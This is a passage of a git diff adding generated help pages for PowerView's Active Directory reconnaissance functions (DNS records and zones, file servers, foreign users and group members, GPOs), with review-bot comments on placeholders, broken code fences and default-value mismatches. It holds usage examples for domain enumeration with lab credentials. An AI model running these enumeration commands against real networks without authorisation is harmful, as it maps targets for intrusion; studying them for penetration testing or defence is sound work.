+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Version
+{{Fill Version Description}}
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: All
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### System.Management.Automation.PSCustomObject
+
+A custom PSObject describing the distributed file systems.
+
+## NOTES
+
+## RELATED LINKS
+
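Review bot: the -Version parameter still carries the platyPS placeholder `{{Fill Version Description}}`. The DESCRIPTION says the function returns "either version 1, 2, or both depending on -Version X" and the yaml block gives `Default value: All`, so document the accepted values here and which of the `(objectClass=fTDfs)` / `(objectClass=msDFS-Linkv2)` searches each one triggers. The DESCRIPTION sentence ending in "respectively" is also missing its period before "The server data is parsed", and EXAMPLE 3's fence closes after the `$SecPassword = ...` line, leaving `$Cred = ...` and `Get-DomainDFSShare -Credential $Cred` outside it.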
diff --git a/docs/Recon/Get-DomainDNSRecord.md b/docs/Recon/Get-DomainDNSRecord.md new file mode 100755 index 0000000..e444fd5 --- /dev/null +++ b/docs/Recon/Get-DomainDNSRecord.md @@ -0,0 +1,181 @@ +# Get-DomainDNSRecord
+
+## SYNOPSIS
+Enumerates the Active Directory DNS records for a given zone.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty, Convert-DNSRecord
+
+## SYNTAX
+
+```
+Get-DomainDNSRecord [-ZoneName] <String> [-Domain <String>] [-Server <String>] [-Properties <String[]>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Given a specific Active Directory DNS zone name, query for all 'dnsNode'
+LDAP entries using that zone as the search base.
+Return all DNS entry results
+and use Convert-DNSRecord to try to convert the binary DNS record blobs.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDNSRecord -ZoneName testlab.local
+```
+
+Retrieve all records for the testlab.local zone.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDNSZone | Get-DomainDNSRecord
+```
+
+Retrieve all records for all zones in the current domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+Get-DomainDNSZone -Domain dev.testlab.local | Get-DomainDNSRecord -Domain dev.testlab.local
+```
+
+Retrieve all records for all zones in the dev.testlab.local domain.
+
+## PARAMETERS
+
+### -ZoneName
+Specifies the zone to query for records (which can be enumearted with Get-DomainDNSZone).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: True
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -Domain
+The domain to query for zones, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Name,distinguishedname,dnsrecord,whencreated,whenchanged
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DNSRecord
+
+Outputs custom PSObjects with detailed information about the DNS record entry.
+
+## NOTES
+
+## RELATED LINKS
+
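Review bot: the -Domain description ("The domain to query for zones, defaults to the current domain.") looks copied from Get-DomainDNSZone; this function queries the records under -ZoneName, so it should read "the domain to query for records". Typo: `enumearted` in the -ZoneName description. As in the other files in this commit, the -ServerTimeLimit text says "Default of 120 seconds" while the yaml block says `Default value: 0`; reconcile the two.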
diff --git a/docs/Recon/Get-DomainDNSZone.md b/docs/Recon/Get-DomainDNSZone.md new file mode 100755 index 0000000..7065b26 --- /dev/null +++ b/docs/Recon/Get-DomainDNSZone.md @@ -0,0 +1,156 @@ +# Get-DomainDNSZone
+
+## SYNOPSIS
+Enumerates the Active Directory DNS zones for a given domain.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Convert-LDAPProperty
+
+## SYNTAX
+
+```
+Get-DomainDNSZone [[-Domain] <String>] [-Server <String>] [-Properties <String[]>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-FindOne] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+{{Fill in the Description}}
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainDNSZone
+```
+
+Retrieves the DNS zones for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainDNSZone -Domain dev.testlab.local -Server primary.testlab.local
+```
+
+Retrieves the DNS zones for the dev.testlab.local domain, binding to primary.testlab.local.
+
+## PARAMETERS
+
+### -Domain
+The domain to query for zones, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByValue)
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to for the search.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -FindOne
+Only return one result object.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases: ReturnOne
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.DNSZone
+
+Outputs custom PSObjects with detailed information about the DNS zone.
+
+## NOTES
+
+## RELATED LINKS
+
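Review bot: the DESCRIPTION is still the platyPS placeholder `{{Fill in the Description}}`; fill it in with how the zones are enumerated, in the style of Get-DomainDNSRecord's DESCRIPTION in this commit (the header lists Get-DomainSearcher and Convert-LDAPProperty as the dependencies, so the query-and-convert flow is what belongs here). The -Properties block gives `Default value: None` whereas Get-DomainDNSRecord lists an explicit default property set; if this function also applies a default property list, document it. The -ServerTimeLimit text/yaml default mismatch ("120 seconds" vs `Default value: 0`) repeats here as well.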
diff --git a/docs/Recon/Get-DomainFileServer.md b/docs/Recon/Get-DomainFileServer.md new file mode 100755 index 0000000..34e9f00 --- /dev/null +++ b/docs/Recon/Get-DomainFileServer.md @@ -0,0 +1,200 @@ +# Get-DomainFileServer
+
+## SYNOPSIS
+Returns a list of servers likely functioning as file servers.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher
+
+## SYNTAX
+
+```
+Get-DomainFileServer [[-Domain] <String[]>] [[-LDAPFilter] <String>] [[-SearchBase] <String>]
+ [[-Server] <String>] [[-SearchScope] <String>] [[-ResultPageSize] <Int32>] [[-ServerTimeLimit] <Int32>]
+ [-Tombstone] [[-Credential] <PSCredential>]
+```
+
+## DESCRIPTION
+Returns a list of likely fileservers by searching for all users in Active Directory
+with non-null homedirectory, scriptpath, or profilepath fields, and extracting/uniquifying
+the server names.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainFileServer
+```
+
+Returns active file servers for the current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainFileServer -Domain testing.local
+```
+
+Returns active file servers for the 'testing.local' domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainFileServer -Credential $Cred
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DomainName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: 2
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: 3
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: 4
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 5
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 6
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 7
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: 8
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### String
+
+One or more strings representing file server names.
+
+## NOTES
+
+## RELATED LINKS
+
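Review bot: the EXAMPLE 1 and EXAMPLE 2 descriptions say "Returns active file servers", but the DESCRIPTION says the result is a list of "likely fileservers" extracted from users' homedirectory, scriptpath and profilepath fields, so no host is checked for being up; drop "active" so the examples match the documented behaviour. EXAMPLE 3's code fence again closes after the `$SecPassword = ...` line, leaving `$Cred = ...` and `Get-DomainFileServer -Credential $Cred` outside it; fence all three lines together.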
diff --git a/docs/Recon/Get-DomainForeignGroupMember.md b/docs/Recon/Get-DomainForeignGroupMember.md new file mode 100755 index 0000000..9061774 --- /dev/null +++ b/docs/Recon/Get-DomainForeignGroupMember.md @@ -0,0 +1,238 @@ +# Get-DomainForeignGroupMember
+
+## SYNOPSIS
+Enumerates groups with users outside of the group's domain and returns
+each foreign member.
+This is a domain's "incoming" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainGroup
+
+## SYNTAX
+
+```
+Get-DomainForeignGroupMember [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainGroup to enumerate all groups for the current (or target) domain,
+then enumerates the members of each group, and compares the member's domain
+name to the parent group's domain name, outputting the member if the domains differ.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainForeignGroupMember
+```
+
+Return all group members in the current domain where the group and member differ.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainForeignGroupMember -Domain dev.testlab.local
+```
+
+Return all group members in the dev.testlab.local domain where the member is not in dev.testlab.local.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all group members in the dev.testlab.local domain where the member is
+not in dev.testlab.local.
+binding to the secondary.dev.testlab.local for
+queries, and using the specified alternate credentials.
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ForeignGroupMember
+
+Custom PSObject with translated group member property fields.
+
+## NOTES
+
+## RELATED LINKS
+
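Review bot: EXAMPLE 3's code fence closes after the `$SecPassword = ConvertTo-SecureString ...` line, so `$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)` and the `Get-DomainForeignGroupMember -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred` call render as body text rather than code; move the closing fence below the third line (the same platyPS wrapping artifact recurs in the other generated files in this commit). The example's description is also broken mid-sentence ("not in dev.testlab.local." then "binding to the secondary.dev.testlab.local for"); it should read as one sentence, "... where the member is not in dev.testlab.local, binding to secondary.dev.testlab.local for queries and using the specified alternate credentials." Under -ServerTimeLimit the prose says "Default of 120 seconds." while the yaml block says "Default value: 0"; one of them is wrong and the documented default should match the function. INPUTS is empty even though -Domain accepts pipeline input (ByPropertyName, ByValue), so it should list String.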
diff --git a/docs/Recon/Get-DomainForeignUser.md b/docs/Recon/Get-DomainForeignUser.md new file mode 100755 index 0000000..85b0092 --- /dev/null +++ b/docs/Recon/Get-DomainForeignUser.md @@ -0,0 +1,239 @@ +# Get-DomainForeignUser
+
+## SYNOPSIS
+Enumerates users who are in groups outside of the user's domain.
+This is a domain's "outgoing" access.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-Domain, Get-DomainUser
+
+## SYNTAX
+
+```
+Get-DomainForeignUser [[-Domain] <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-Credential <PSCredential>]
+```
+
+## DESCRIPTION
+Uses Get-DomainUser to enumerate all users for the current (or target) domain,
+then calculates the given user's domain name based on the user's distinguishedName.
+This domain name is compared to the queried domain, and the user object is
+output if they differ.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainForeignUser
+```
+
+Return all users in the current domain who are in groups not in the
+current domain.
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainForeignUser -Domain dev.testlab.local
+```
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain.
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred
+
+Return all users in the dev.testlab.local domain who are in groups not in the
+dev.testlab.local domain, binding to the secondary.dev.testlab.local for queries, and
+using the specified alternate credentials.
+
+## PARAMETERS
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
+Specifies the properties of the output object to retrieve from the server.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchBase
+The LDAP source to search through, e.g.
+"LDAP://OU=secret,DC=testlab,DC=local"
+Useful for OU queries.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: ADSPath
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Server
+Specifies an Active Directory server (domain controller) to bind to.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: DomainController
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SearchScope
+Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: Subtree
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ResultPageSize
+Specifies the PageSize to set for the LDAP searcher object.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 200
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -ServerTimeLimit
+Specifies the maximum amount of time the server spends searching.
+Default of 120 seconds.
+
+```yaml
+Type: Int32
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: 0
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -SecurityMasks
+Specifies an option for examining security information of a directory object.
+One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Tombstone
+Switch.
+Specifies that the searcher should also return deleted/tombstoned objects.
+
+```yaml
+Type: SwitchParameter
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: False
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Credential
+A \[Management.Automation.PSCredential\] object of alternate credentials
+for connection to the target domain.
+
+```yaml
+Type: PSCredential
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: [Management.Automation.PSCredential]::Empty
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+## INPUTS
+
+## OUTPUTS
+
+### PowerView.ForeignUser
+
+Custom PSObject with translated user property fields.
+
+## NOTES
+
+## RELATED LINKS
+
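Review bot: the DESCRIPTION does not explain how group membership enters the comparison, yet the SYNOPSIS and all three examples promise "users who are in groups not in the current domain". As written ("calculates the given user's domain name based on the user's distinguishedName. This domain name is compared to the queried domain"), every user returned by Get-DomainUser for the queried domain has a distinguishedName in that domain, so nothing would ever be output; the text should say which DN is compared against the user's domain (presumably each memberOf entry) so the reader can tell what "foreign" means here. Same mechanical issues as the previous file: EXAMPLE 3's fence closes after the first line, leaving the `$Cred = ...` and `Get-DomainForeignUser -Domain dev.testlab.local -Server secondary.dev.testlab.local -Credential $Cred` lines outside the code block; -ServerTimeLimit says "Default of 120 seconds." in prose but "Default value: 0" in yaml; and INPUTS is empty although -Domain accepts pipeline input ByValue.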
diff --git a/docs/Recon/Get-DomainGPO.md b/docs/Recon/Get-DomainGPO.md new file mode 100755 index 0000000..9d0a468 --- /dev/null +++ b/docs/Recon/Get-DomainGPO.md @@ -0,0 +1,354 @@ +# Get-DomainGPO
+
+## SYNOPSIS
+Return all GPOs or specific GPO objects in AD.
+
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainSearcher, Get-DomainComputer, Get-DomainUser, Get-DomainOU, Get-NetComputerSiteName, Get-DomainSite, Get-DomainObject, Convert-LDAPProperty
+
+## SYNTAX
+
+### None (Default)
+```
+Get-DomainGPO [[-Identity] <String[]>] [-Domain <String>] [-LDAPFilter <String>] [-Properties <String[]>]
+ [-SearchBase <String>] [-Server <String>] [-SearchScope <String>] [-ResultPageSize <Int32>]
+ [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne] [-Credential <PSCredential>]
+ [-Raw]
+```
+
+### ComputerIdentity
+```
+Get-DomainGPO [[-Identity] <String[]>] [-ComputerIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+### UserIdentity
+```
+Get-DomainGPO [[-Identity] <String[]>] [-UserIdentity <String>] [-Domain <String>] [-LDAPFilter <String>]
+ [-Properties <String[]>] [-SearchBase <String>] [-Server <String>] [-SearchScope <String>]
+ [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-SecurityMasks <String>] [-Tombstone] [-FindOne]
+ [-Credential <PSCredential>] [-Raw]
+```
+
+## DESCRIPTION
+Builds a directory searcher object using Get-DomainSearcher, builds a custom
+LDAP filter based on targeting/filter parameters, and searches for all objects
+matching the criteria.
+To only return specific properies, use
+"-Properties samaccountname,usnchanged,...".
+By default, all GPO objects for
+the current domain are returned.
+To enumerate all GPOs that are applied to
+a particular machine, use -ComputerName X.
+
+## EXAMPLES
+
+### -------------------------- EXAMPLE 1 --------------------------
+```
+Get-DomainGPO -Domain testlab.local
+```
+
+Return all GPOs for the testlab.local domain
+
+### -------------------------- EXAMPLE 2 --------------------------
+```
+Get-DomainGPO -ComputerName windows1.testlab.local
+```
+
+Returns all GPOs applied windows1.testlab.local
+
+### -------------------------- EXAMPLE 3 --------------------------
+```
+"{F260B76D-55C8-46C5-BEF1-9016DD98E272}","Test GPO" | Get-DomainGPO
+```
+
+Return the GPOs with the name of "{F260B76D-55C8-46C5-BEF1-9016DD98E272}" and the display
+name of "Test GPO"
+
+### -------------------------- EXAMPLE 4 --------------------------
+```
+Get-DomainGPO -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon
+```
+
+### -------------------------- EXAMPLE 5 --------------------------
+```
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+```
+
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Get-DomainGPO -Credential $Cred
+
+## PARAMETERS
+
+### -Identity
+A display name (e.g.
+'Test GPO'), DistinguishedName (e.g.
+'CN={F260B76D-55C8-46C5-BEF1-9016DD98E272},CN=Policies,CN=System,DC=testlab,DC=local'),
+GUID (e.g.
+'10ec320d-3111-4ef4-8faf-8f14f4adc789'), or GPO name (e.g.
+'{F260B76D-55C8-46C5-BEF1-9016DD98E272}').
+Wildcards accepted.
+
+```yaml
+Type: String[]
+Parameter Sets: (All)
+Aliases: DistinguishedName, SamAccountName, Name
+
+Required: False
+Position: 1
+Default value: None
+Accept pipeline input: True (ByPropertyName, ByValue)
+Accept wildcard characters: False
+```
+
+### -ComputerIdentity
+Return all GPO objects applied to a given computer identity (name, dnsname, DistinguishedName, etc.).
+
+```yaml
+Type: String
+Parameter Sets: ComputerIdentity
+Aliases: ComputerName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -UserIdentity
+Return all GPO objects applied to a given user identity (name, SID, DistinguishedName, etc.).
+
+```yaml
+Type: String
+Parameter Sets: UserIdentity
+Aliases: UserName
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Domain
+Specifies the domain to use for the query, defaults to the current domain.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases:
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -LDAPFilter
+Specifies an LDAP query string that is used to filter Active Directory objects.
+
+```yaml
+Type: String
+Parameter Sets: (All)
+Aliases: Filter
+
+Required: False
+Position: Named
+Default value: None
+Accept pipeline input: False
+Accept wildcard characters: False
+```
+
+### -Properties
